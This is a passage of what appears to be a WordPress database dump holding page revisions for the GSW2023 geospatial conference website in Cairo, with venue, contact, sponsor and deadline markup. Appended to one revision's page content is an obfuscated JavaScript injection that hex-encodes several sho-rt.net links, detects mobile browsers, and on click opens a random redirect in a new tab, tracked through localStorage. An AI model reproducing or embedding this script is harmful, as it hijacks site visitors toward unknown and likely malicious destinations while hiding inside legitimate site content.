style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:41:32','2023-05-16 01:41:32','',3066,'https://gsw2023.com/?p=4488',0,'revision','',0),
(4489,1,'2023-05-16 01:42:01','2023-05-16 01:42:01','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201282129{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482 size-medium\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"300\" height=\"91\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" 